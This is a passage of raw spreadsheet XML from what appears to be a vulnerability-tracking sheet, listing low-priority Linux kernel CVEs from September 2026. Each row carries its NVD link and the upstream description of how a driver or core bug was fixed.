The old wmb() after WRITE_ONCE(enabled, true) does not publish the
earlier initialization before enabled becomes visible. Use a release store
when enabling the queue and acquire loads when testing it.
Although the shutdown-side enabled accesses are not used for publishing
queue initialization, use helpers for them as well for consistency.</t>
        </is>
      </c>
      <c r="T969" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93152</t>
        </is>
      </c>
    </row>
    <row r="970">
      <c r="A970" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B970" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93153</t>
        </is>
      </c>
      <c r="D970" s="5" t="inlineStr"/>
      <c r="E970" s="5" t="inlineStr"/>
      <c r="F970" s="5" t="inlineStr"/>
      <c r="G970" s="5" t="inlineStr"/>
      <c r="H970" s="5" t="inlineStr"/>
      <c r="I970" s="5" t="inlineStr"/>
      <c r="J970" s="5" t="inlineStr"/>
      <c r="K970" s="5" t="inlineStr"/>
      <c r="L970" s="5" t="inlineStr"/>
      <c r="M970" s="5" t="inlineStr"/>
      <c r="N970" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O970" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P970" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q970" s="5" t="inlineStr"/>
      <c r="R970" s="5" t="inlineStr"/>
      <c r="S970" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/bng_re: return a timeout when firmware responses stall
__wait_for_resp() documents that it returns a non-zero error when a
firmware command does not complete, and bng_re_rcfw_send_message() already
marks the firmware as stalled when the helper returns -ENODEV.
However, the helper ignores wait_event_timeout() expiry.  If the response
slot remains in use after the timeout and after the polled CREQ service
attempt, the loop starts another full timeout period and can repeat
forever.
Return -ENODEV after a timed out wait that still has no response.  The
existing caller then marks FIRMWARE_STALL_DETECTED and returns
-ETIMEDOUT to the command issuer.</t>
        </is>
      </c>
      <c r="T970" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93153</t>
        </is>
      </c>
    </row>
    <row r="971">
      <c r="A971" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B971" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93154</t>
        </is>
      </c>
      <c r="D971" s="5" t="inlineStr"/>
      <c r="E971" s="5" t="inlineStr"/>
      <c r="F971" s="5" t="inlineStr"/>
      <c r="G971" s="5" t="inlineStr"/>
      <c r="H971" s="5" t="inlineStr"/>
      <c r="I971" s="5" t="inlineStr"/>
      <c r="J971" s="5" t="inlineStr"/>
      <c r="K971" s="5" t="inlineStr"/>
      <c r="L971" s="5" t="inlineStr"/>
      <c r="M971" s="5" t="inlineStr"/>
      <c r="N971" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O971" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P971" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q971" s="5" t="inlineStr"/>
      <c r="R971" s="5" t="inlineStr"/>
      <c r="S971" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/irdma: Add refcounting to user ring MRs
Prevent userspace from deregistering the MRs that back QP/CQ/SRQ rings
by bumping the MR's refcount upon association.</t>
        </is>
      </c>
      <c r="T971" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93154</t>
        </is>
      </c>
    </row>
    <row r="972">
      <c r="A972" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B972" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93155</t>
        </is>
      </c>
      <c r="D972" s="5" t="inlineStr"/>
      <c r="E972" s="5" t="inlineStr"/>
      <c r="F972" s="5" t="inlineStr"/>
      <c r="G972" s="5" t="inlineStr"/>
      <c r="H972" s="5" t="inlineStr"/>
      <c r="I972" s="5" t="inlineStr"/>
      <c r="J972" s="5" t="inlineStr"/>
      <c r="K972" s="5" t="inlineStr"/>
      <c r="L972" s="5" t="inlineStr"/>
      <c r="M972" s="5" t="inlineStr"/>
      <c r="N972" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O972" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P972" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q972" s="5" t="inlineStr"/>
      <c r="R972" s="5" t="inlineStr"/>
      <c r="S972" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: keembay - Fix AEAD unregister count in error path
register_aes_algs() registers the AEAD algorithms before registering the
skcipher algorithms.  If skcipher registration fails, the function unwinds
the earlier AEAD registration with crypto_engine_unregister_aeads(), but it
passes ARRAY_SIZE(algs), which is the skcipher table size.
Use ARRAY_SIZE(algs_aead) for the AEAD unwind path so the unregister helper
iterates over the same table that was registered.  Also clarify the nearby
comment: the crypto registration helpers clean up algorithms registered
within the same call, while this function must still unwind earlier
successful registration steps.</t>
        </is>
      </c>
      <c r="T972" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93155</t>
        </is>
      </c>
    </row>
    <row r="973">
      <c r="A973" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B973" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93156</t>
        </is>
      </c>
      <c r="D973" s="5" t="inlineStr"/>
      <c r="E973" s="5" t="inlineStr"/>
      <c r="F973" s="5" t="inlineStr"/>
      <c r="G973" s="5" t="inlineStr"/>
      <c r="H973" s="5" t="inlineStr"/>
      <c r="I973" s="5" t="inlineStr"/>
      <c r="J973" s="5" t="inlineStr"/>
      <c r="K973" s="5" t="inlineStr"/>
      <c r="L973" s="5" t="inlineStr"/>
      <c r="M973" s="5" t="inlineStr"/>
      <c r="N973" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O973" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P973" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q973" s="5" t="inlineStr"/>
      <c r="R973" s="5" t="inlineStr"/>
      <c r="S973" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: rk3288 - fail ahash requests on HASH idle timeout
rk_hash_run() waits for RK_CRYPTO_HASH_STS to become idle after the
final DMA transfer, but ignores the poll result. If the hash engine
never becomes idle, the driver still reads the digest registers and
finalizes the request with the previous success value.
Store the poll result and finalize the request with the timeout error
before reading the digest registers.</t>
        </is>
      </c>
      <c r="T973" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93156</t>
        </is>
      </c>
    </row>
    <row r="974">
      <c r="A974" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B974" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93157</t>
        </is>
      </c>
      <c r="D974" s="5" t="inlineStr"/>
      <c r="E974" s="5" t="inlineStr"/>
      <c r="F974" s="5" t="inlineStr"/>
      <c r="G974" s="5" t="inlineStr"/>
      <c r="H974" s="5" t="inlineStr"/>
      <c r="I974" s="5" t="inlineStr"/>
      <c r="J974" s="5" t="inlineStr"/>
      <c r="K974" s="5" t="inlineStr"/>
      <c r="L974" s="5" t="inlineStr"/>
      <c r="M974" s="5" t="inlineStr"/>
      <c r="N974" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O974" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P974" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q974" s="5" t="inlineStr"/>
      <c r="R974" s="5" t="inlineStr"/>
      <c r="S974" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwrng: xilinx-trng - propagate timeout before any data is read
xtrng_readblock32() polls for 16-byte chunks but returns the number of
bytes read even when the first poll times out. Its caller then treats a
zero return as a short successful read, and partial reads for full
32-byte blocks can make the tail copy use a fixed block offset rather
than the amount already produced.
Return the poll error when no data has been read, preserve partial
positive returns after some data is available, stop the generator on all
collection exits, and append tail bytes at the current output count.</t>
        </is>
      </c>
      <c r="T974" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93157</t>
        </is>
      </c>
    </row>
    <row r="975">
      <c r="A975" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B975" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93158</t>
        </is>
      </c>
      <c r="D975" s="5" t="inlineStr"/>
      <c r="E975" s="5" t="inlineStr"/>
      <c r="F975" s="5" t="inlineStr"/>
      <c r="G975" s="5" t="inlineStr"/>
      <c r="H975" s="5" t="inlineStr"/>
      <c r="I975" s="5" t="inlineStr"/>
      <c r="J975" s="5" t="inlineStr"/>
      <c r="K975" s="5" t="inlineStr"/>
      <c r="L975" s="5" t="inlineStr"/>
      <c r="M975" s="5" t="inlineStr"/>
      <c r="N975" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O975" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P975" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q975" s="5" t="inlineStr"/>
      <c r="R975" s="5" t="inlineStr"/>
      <c r="S975" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: sa2ul - stop probe if context pool creation fails
sa_ul_probe() calls sa_init_mem() to create the DMA pool used for
security context buffers, but ignores its return value. If pool creation
fails, probe still continues with DMA setup, algorithm registration and
child population even though later request setup depends on that pool.
Stop probing when sa_init_mem() fails, and route that failure to the PM
cleanup path without attempting to destroy an uncreated DMA pool.</t>
        </is>
      </c>
      <c r="T975" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93158</t>
        </is>
      </c>
    </row>
    <row r="976">
      <c r="A976" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B976" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93159</t>
        </is>
      </c>
      <c r="D976" s="5" t="inlineStr"/>
      <c r="E976" s="5" t="inlineStr"/>
      <c r="F976" s="5" t="inlineStr"/>
      <c r="G976" s="5" t="inlineStr"/>
      <c r="H976" s="5" t="inlineStr"/>
      <c r="I976" s="5" t="inlineStr"/>
      <c r="J976" s="5" t="inlineStr"/>
      <c r="K976" s="5" t="inlineStr"/>
      <c r="L976" s="5" t="inlineStr"/>
      <c r="M976" s="5" t="inlineStr"/>
      <c r="N976" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O976" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P976" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q976" s="5" t="inlineStr"/>
      <c r="R976" s="5" t="inlineStr"/>
      <c r="S976" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: atmel-sha204a - fix heap info leak on I2C transfer failure
The nonblocking RNG path allocates a work_data structure to track the
state of an in-flight asynchronous I2C request. This pointer is stored
in rng-&gt;priv and later consumed by the read path once the transaction
completes.
If the underlying I2C transfer fails, the completion callback is invoked
with a non-zero status. In this case, the allocated work_data is not
usable for producing RNG output and must not remain associated with the
hwrng state.
Previously, the failure path only logged a warning but left the pointer
state uncleared, which can result in subsequent read attempts observing
stale state and interpreting it as valid completion data.
Fix this by freeing the pending work_data. The I2C transaction reports
an error. This ensures that failed requests do not leave residual state
behind that could be interpreted as valid RNG data on later reads.
Clearing rng-&gt;priv is done at the subsequent call to nonblocking read.</t>
        </is>
      </c>
      <c r="T976" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93159</t>
        </is>
      </c>
    </row>
    <row r="977">
      <c r="A977" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B977" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93160</t>
        </is>
      </c>
      <c r="D977" s="5" t="inlineStr"/>
      <c r="E977" s="5" t="inlineStr"/>
      <c r="F977" s="5" t="inlineStr"/>
      <c r="G977" s="5" t="inlineStr"/>
      <c r="H977" s="5" t="inlineStr"/>
      <c r="I977" s="5" t="inlineStr"/>
      <c r="J977" s="5" t="inlineStr"/>
      <c r="K977" s="5" t="inlineStr"/>
      <c r="L977" s="5" t="inlineStr"/>
      <c r="M977" s="5" t="inlineStr"/>
      <c r="N977" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O977" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P977" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q977" s="5" t="inlineStr"/>
      <c r="R977" s="5" t="inlineStr"/>
      <c r="S977" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: atmel-ecc - reject hardware ECDH without a public key
The hardware ECDH path in atmel_ecdh_compute_shared_secret() uses the
private key stored in the device. However, the public key is cached only
after atmel_ecdh_set_secret() successfully generated that private key
for the current tfm.
atmel_ecdh_generate_public_key() already rejects requests when no public
key is cached. Add the same check to atmel_ecdh_compute_shared_secret()
to prevent the device from using a private key that was not generated
for the current tfm.</t>
        </is>
      </c>
      <c r="T977" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93160</t>
        </is>
      </c>
    </row>
    <row r="978">
      <c r="A978" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B978" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93161</t>
        </is>
      </c>
      <c r="D978" s="5" t="inlineStr"/>
      <c r="E978" s="5" t="inlineStr"/>
      <c r="F978" s="5" t="inlineStr"/>
      <c r="G978" s="5" t="inlineStr"/>
      <c r="H978" s="5" t="inlineStr"/>
      <c r="I978" s="5" t="inlineStr"/>
      <c r="J978" s="5" t="inlineStr"/>
      <c r="K978" s="5" t="inlineStr"/>
      <c r="L978" s="5" t="inlineStr"/>
      <c r="M978" s="5" t="inlineStr"/>
      <c r="N978" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O978" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P978" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q978" s="5" t="inlineStr"/>
      <c r="R978" s="5" t="inlineStr"/>
      <c r="S978" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: qat - clear AES key schedule from stack
qat_alg_xts_reverse_key() expands the forward XTS AES key on the stack.
That schedule contains key material and can remain in the stack frame.
Clear the temporary crypto_aes_ctx with memzero_explicit() after the copy.</t>
        </is>
      </c>
      <c r="T978" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93161</t>
        </is>
      </c>
    </row>
    <row r="979">
      <c r="A979" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B979" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93162</t>
        </is>
      </c>
      <c r="D979" s="5" t="inlineStr"/>
      <c r="E979" s="5" t="inlineStr"/>
      <c r="F979" s="5" t="inlineStr"/>
      <c r="G979" s="5" t="inlineStr"/>
      <c r="H979" s="5" t="inlineStr"/>
      <c r="I979" s="5" t="inlineStr"/>
      <c r="J979" s="5" t="inlineStr"/>
      <c r="K979" s="5" t="inlineStr"/>
      <c r="L979" s="5" t="inlineStr"/>
      <c r="M979" s="5" t="inlineStr"/>
      <c r="N979" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O979" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P979" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q979" s="5" t="inlineStr"/>
      <c r="R979" s="5" t="inlineStr"/>
      <c r="S979" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crypto: qat - cancel work on re-enable SR-IOV timeout
The QAT reset worker queues SR-IOV reenable work using a work_struct and
completion embedded in an on-stack adf_sriov_dev_data. If the completion
wait times out, the reset worker can return while device_sriov_wq still
holds or executes the stack-backed work item.
Cancel the work on the device_sriov_wq on timeout before the stack frame
unwinds.</t>
        </is>
      </c>
      <c r="T979" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93162</t>
        </is>
      </c>
    </row>
    <row r="980">
      <c r="A980" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B980" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93163</t>
        </is>
      </c>
      <c r="D980" s="5" t="inlineStr"/>
      <c r="E980" s="5" t="inlineStr"/>
      <c r="F980" s="5" t="inlineStr"/>
      <c r="G980" s="5" t="inlineStr"/>
      <c r="H980" s="5" t="inlineStr"/>
      <c r="I980" s="5" t="inlineStr"/>
      <c r="J980" s="5" t="inlineStr"/>
      <c r="K980" s="5" t="inlineStr"/>
      <c r="L980" s="5" t="inlineStr"/>
      <c r="M980" s="5" t="inlineStr"/>
      <c r="N980" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O980" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P980" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q980" s="5" t="inlineStr"/>
      <c r="R980" s="5" t="inlineStr"/>
      <c r="S980" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
hwrng: core - fix rng list on registration error
hwrng_register(rng) does the following:
1. Checks if rng has name and read methods set
2. Checks if the name already exists
3. Adds rng to global rng_list
4. May try to set rng to current_rng
If step 4 fails, it returns an error. However, it does not remove the
rng from rng_list, causing a dangling reference which can result in
use-after-free if the caller frees rng, since registration failed.
Add a list_del_init() cleanup step.</t>
        </is>
      </c>
      <c r="T980" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93163</t>
        </is>
      </c>
    </row>
    <row r="981">
      <c r="A981" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B981" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93164</t>
        </is>
      </c>
      <c r="D981" s="5" t="inlineStr"/>
      <c r="E981" s="5" t="inlineStr"/>
      <c r="F981" s="5" t="inlineStr"/>
      <c r="G981" s="5" t="inlineStr"/>
      <c r="H981" s="5" t="inlineStr"/>
      <c r="I981" s="5" t="inlineStr"/>
      <c r="J981" s="5" t="inlineStr"/>
      <c r="K981" s="5" t="inlineStr"/>
      <c r="L981" s="5" t="inlineStr"/>
      <c r="M981" s="5" t="inlineStr"/>
      <c r="N981" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O981" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P981" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q981" s="5" t="inlineStr"/>
      <c r="R981" s="5" t="inlineStr"/>
      <c r="S981" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
uprobes/x86: Move optimized uprobe from nop5 to nop10
Andrii reported an issue with optimized uprobes [1] that can clobber
redzone area with call instruction storing return address on stack
where user code may keep temporary data without adjusting rsp.
Fixing this by moving the optimized uprobes on top of 10-bytes nop
instruction, so we can squeeze another instruction to escape the
redzone area before doing the call, like:
  lea -0x80(%rsp), %rsp
  call tramp
Note the lea instruction is used to adjust the rsp register without
changing the flags.
We use nop10 and following transformation to optimized instructions
above and back as suggested by Peterz [2].
Optimize path (int3_update_optimize):
  1) Initial state after set_swbp() installed the uprobe:
      cc 2e 0f 1f 84 00 00 00 00 00
     From offset 0 this is INT3 followed by the tail of the original
     10-byte NOP.
     After a previous unoptimization bytes 5..9 may still contain the
     old call instruction, which remains valid for threads already there.
  2) Rewrite the LEA tail and call displacement:
      cc [8d 64 24 80 e8 d0 d1 d2 d3]
     From offset 0 this traps on the uprobe INT3.  Bytes 1..9 are not
     executable entry points while byte 0 is trapped.
  3) Publish the first LEA byte:
      [48] 8d 64 24 80 e8 d0 d1 d2 d3
     From offset 0 this is:
        lea -0x80(%rsp), %rsp
        call &lt;uprobe-trampoline&gt;
Unoptimize path (int3_update_unoptimize):
  1) Initial optimized state:
      48 8d 64 24 80 e8 d0 d1 d2 d3
     Same as 3) above.
  2) Trap new entries before restoring the NOP bytes:
      [cc] 8d 64 24 80 e8 d0 d1 d2 d3
     From offset 0 this traps. A thread that had already executed the
     LEA can still reach the intact CALL at offset 5.
  3) Restore bytes 1..4 of the original NOP while keeping byte 0 trapped
     and byte 5 as CALL.
      cc [2e 0f 1f 84] e8 d0 d1 d2 d3
     From offset 0 this still traps. Offset 5 is still the CALL for any
     thread that was already past the first LEA byte.
  4) Publish the first byte of the original NOP:
      [66] 2e 0f 1f 84 e8 d0 d1 d2 d3
     From offset 0 this is the restored 10-byte NOP; the CALL opcode and
     displacement are now only NOP operands.  Offset 5 still decodes as
     CALL for a thread that was already there.
     Tthere is only a single target uprobe-trampoline for the given nop10
     instruction address, so the CALL instruction will not be changed across
     unoptimization/optimization cycles.
     Therefore, any task that is preempted at the CALL instruction is guaranteed
     to observe that CALL and not anything else.
Note as explained in [2] we need to use following nop10:
       PF1   PF2   ESC   NOPL  MOD   SIB   DISP32
NOP10: 0x66, 0x2e, 0x0f, 0x1f, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00 -- cs nopw 0x00000000(%rax,%rax,1)
which means we need to allow 0x2e prefix which maps to INAT_PFX_CS
attribute in is_prefix_bad function.
Also changing the uprobe syscall error when called out of uprobe
trampoline to -EPROTO, so we are able to detect the fixed kernel.
The optimized uprobe performance stays the same:
        uprobe-nop     :    3.129 ± 0.013M/s
        uprobe-push    :    3.045 ± 0.006M/s
        uprobe-ret     :    1.095 ± 0.004M/s
  --&gt;   uprobe-nop10   :    7.170 ± 0.020M/s
        uretprobe-nop  :    2.143 ± 0.021M/s
        uretprobe-push :    2.090 ± 0.000M/s
        uretprobe-ret  :    0.942 ± 0.000M/s
  --&gt;   uretprobe-nop10:    3.381 ± 0.003M/s
        usdt-nop       :    3.245 ± 0.004M/s
  --&gt;   usdt-nop10     :    7.256 ± 0.023M/s
[1] https://lore.kernel.org/bpf/20260509003146.976844-1-andrii@kernel.org/
[2] https://lore.kernel.org/bpf/20260518104306.GU3102624@noisy.programming.kicks-ass.net/#t</t>
        </is>
      </c>
      <c r="T981" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93164</t>
        </is>
      </c>
    </row>
    <row r="982">
      <c r="A982" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B982" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93165</t>
        </is>
      </c>
      <c r="D982" s="5" t="inlineStr"/>
      <c r="E982" s="5" t="inlineStr"/>
      <c r="F982" s="5" t="inlineStr"/>
      <c r="G982" s="5" t="inlineStr"/>
      <c r="H982" s="5" t="inlineStr"/>
      <c r="I982" s="5" t="inlineStr"/>
      <c r="J982" s="5" t="inlineStr"/>
      <c r="K982" s="5" t="inlineStr"/>
      <c r="L982" s="5" t="inlineStr"/>
      <c r="M982" s="5" t="inlineStr"/>
      <c r="N982" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O982" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P982" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q982" s="5" t="inlineStr"/>
      <c r="R982" s="5" t="inlineStr"/>
      <c r="S982" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/chrome: sensorhub: Fix memory overread in ring handler
`max_response` and `sensor_num` are read from different EC commands:
- `max_response` is from cros_ec_get_proto_info().
    ec_dev-&gt;max_response = info-&gt;max_response_packet_size -
                                    sizeof(struct ec_host_response);
- `sensor_num` is from cros_ec_get_sensor_count().
    sensor_num = cros_ec_get_sensor_count(ec);
With a malfunctioning EC firmware, it is possible that the `msg-&gt;insize`
(i.e., `fifo_info_length` in the context) could be clamped in
cros_ec_cmd_xfer() because `msg-&gt;insize` is greater than `max_response`.
    int fifo_info_length =
            sizeof(struct ec_response_motion_sense_fifo_info) +
            sizeof(u16) * sensorhub-&gt;sensor_num;
This means the number of read bytes could be less than expected.  As a
result, the subsequent memcpy() in cros_ec_sensorhub_ring_handler()
overreads the `resp-&gt;fifo_info` buffer.
Check the return value of cros_ec_cmd_xfer_status() and abort if the
number of bytes read does not match the expected length.</t>
        </is>
      </c>
      <c r="T982" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93165</t>
        </is>
      </c>
    </row>
    <row r="983">
      <c r="A983" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B983" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93166</t>
        </is>
      </c>
      <c r="D983" s="5" t="inlineStr"/>
      <c r="E983" s="5" t="inlineStr"/>
      <c r="F983" s="5" t="inlineStr"/>
      <c r="G983" s="5" t="inlineStr"/>
      <c r="H983" s="5" t="inlineStr"/>
      <c r="I983" s="5" t="inlineStr"/>
      <c r="J983" s="5" t="inlineStr"/>
      <c r="K983" s="5" t="inlineStr"/>
      <c r="L983" s="5" t="inlineStr"/>
      <c r="M983" s="5" t="inlineStr"/>
      <c r="N983" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O983" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P983" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q983" s="5" t="inlineStr"/>
      <c r="R983" s="5" t="inlineStr"/>
      <c r="S983" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: rtw89: debug: fix off by on in rtw89_ppdu_str()
This &gt; comparison should be &gt;= to avoid an out of bounds access.</t>
        </is>
      </c>
      <c r="T983" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93166</t>
        </is>
      </c>
    </row>
    <row r="984">
      <c r="A984" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B984" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93167</t>
        </is>
      </c>
      <c r="D984" s="5" t="inlineStr"/>
      <c r="E984" s="5" t="inlineStr"/>
      <c r="F984" s="5" t="inlineStr"/>
      <c r="G984" s="5" t="inlineStr"/>
      <c r="H984" s="5" t="inlineStr"/>
      <c r="I984" s="5" t="inlineStr"/>
      <c r="J984" s="5" t="inlineStr"/>
      <c r="K984" s="5" t="inlineStr"/>
      <c r="L984" s="5" t="inlineStr"/>
      <c r="M984" s="5" t="inlineStr"/>
      <c r="N984" s="5" t="inlineStr">
        <is>
